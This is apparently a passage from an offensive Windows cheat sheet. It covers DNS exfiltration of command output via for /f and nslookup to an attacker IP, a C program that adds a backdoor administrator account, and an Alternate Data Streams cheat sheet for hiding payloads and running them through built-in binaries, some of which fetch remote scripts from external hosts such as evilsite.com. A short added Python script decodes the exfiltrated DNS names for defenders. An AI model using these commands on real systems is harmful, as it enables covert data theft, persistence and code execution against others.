You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.

```
netsh http show urlacl
```

Manual DNS shell

The attacker (Kali) must use one of these two options:

```
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
```

Victim

for /f tokens technique: this lets us execute commands, take the first X words of each output line and send them through DNS to our server.

```
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
```

You can also redirect the output to a file and then read it:

```
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```
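Added example for the defender's side of the exchange above (not code from the original page): given the query names a packet capture or endpoint DNS log recorded, it reverses the `%a.%b.%c` dot-join to recover the smuggled output lines and flags names whose labels contain characters no real hostname uses. The query names in `SAMPLE_QUERIES` are constructed from what `dir /B C:\` and `whoami /priv` would produce.

```python
"""Rebuild command output smuggled out with
   for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP>
from the names seen in DNS queries.  Added example, not part of the original page."""
import re

# A legitimate hostname label is limited to letters, digits, '-' (and '_' for SRV records).
_HOST_LABEL = re.compile(r"^[A-Za-z0-9_-]+$")

def labels(qname):
    # for /f leaves a variable empty when a line has fewer tokens than requested,
    # which produces consecutive or trailing dots; those empty labels carry no data.
    return [lbl for lbl in qname.rstrip(".").split(".") if lbl]

def reconstruct_line(qname):
    """Undo the dot-join: one query name is one output line, words separated by dots.
    Lossy by design: a dot inside an original word (file.txt) cannot be told from a separator."""
    return " ".join(labels(qname))

def looks_like_exfil(qname):
    """Flag names whose labels contain characters invalid in hostnames (paths, parentheses, ...)."""
    return any(not _HOST_LABEL.match(lbl) for lbl in labels(qname))

def reconstruct(qnames):
    """Recover every smuggled line from a sequence of queried names, in order."""
    return [reconstruct_line(q) for q in qnames]

SAMPLE_QUERIES = [  # constructed: queries the victim-side loops above would generate
    "PerfLogs..",
    "Program.Files.",
    "Program.Files.(x86)",
    "Users..",
    "SeShutdownPrivilege.Shut.down.the.system.Disabled",
    "www.example.com",   # an ordinary lookup, for contrast
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        flag = "EXFIL?" if looks_like_exfil(q) else "      "
        print(f"{flag} {q:52} -> {reconstruct_line(q)}")
```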

Call CMD from C code

To call CMD from C code, you can use the system() function provided by the C standard library (stdlib.h). It hands the string you pass to the command interpreter and waits for it to finish.

Here is an example of how to call CMD from C code:

```c
#include <stdlib.h>

int main(void) {
    // Command to be executed
    char command[] = "dir";

    // Calling CMD using the system() function
    system(command);

    return 0;
}
```

In the above example, the system() function is used to execute the dir command, which lists the files and directories in the current directory. You can replace dir with any other CMD command you want to execute.

To compile and run the above code, you can use a C compiler such as GCC. Save the code in a file with a .c extension (e.g., call_cmd.c), and then compile it using the following command:

```
gcc call_cmd.c -o call_cmd
```

After compiling, you can run the program by executing the generated executable file:

```
./call_cmd
```

This will call CMD and execute the specified command. The output of the command will be displayed in the command prompt.

```c
#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by an Administrator this program will create a user and then add it to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main(void) {
    system("net users otherAcc 0TherAcc! /add");
    system("net localgroup administrators otherAcc /add");
    return 0;
}
```

Alternate Data Streams CheatSheet (ADS/Alternate Data Streams)

From https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

```
## Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
Set-Content -Path {path to the file} -Stream {name of the stream}

## Discover ADS content
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\file.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

## Extract content from ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe

## Executing the ADS content

* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll

* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js

* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)

* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209

* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

* Powershell.exe
powershell -ep bypass - < c:\temp:ttt

* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}

* Regedit.exe
regedit c:\ads\file.txt:regfile.reg

* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile

* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe

* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904

* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt
rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
```